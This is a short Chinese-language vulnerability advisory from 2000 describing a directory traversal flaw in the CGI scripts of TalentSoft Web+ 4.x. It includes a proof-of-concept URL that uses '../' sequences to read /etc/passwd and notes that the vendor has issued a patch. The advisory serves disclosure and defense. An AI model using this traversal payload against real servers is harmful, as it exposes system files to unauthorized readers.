发布日期：2000-04-14
更新日期：2000-04-14

受影响系统：

TalentSoft Web+ 4.x 和更低的版本。

描述：

---

Web+是TalentSoft公司的电子商务服务端软件，可运行在标准的web服务器上。它通过CGI
的脚本完成各种工作。它的CGI脚本没有检查用户输入的文件名中是否包含"../"字符串，
导致远程用户可以访问服务器上的文件。远程用户只要知道文件名并且web server有足够
的权限，就可以通过浏览器显示任意的系统文件。   

<* 来源：John P. McNeely (jmcneely@sses.net) *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

例如有如下URL：
http://yourhost.com/cgi-bin/webplus?script=/script_dir/store.wml

通过增加"../"，攻击者可以浏览系统文件：

http://yourhost.com/cgi-bin/webplus?script=/../../../../etc/passwd

建议：

---

TalentSoft 公司已经推出补丁包，可以和support@talentsoft.com 联系得到。
URL: http://www.talentsoft.com

浏览次数：6171
严重程度：0（网友投票）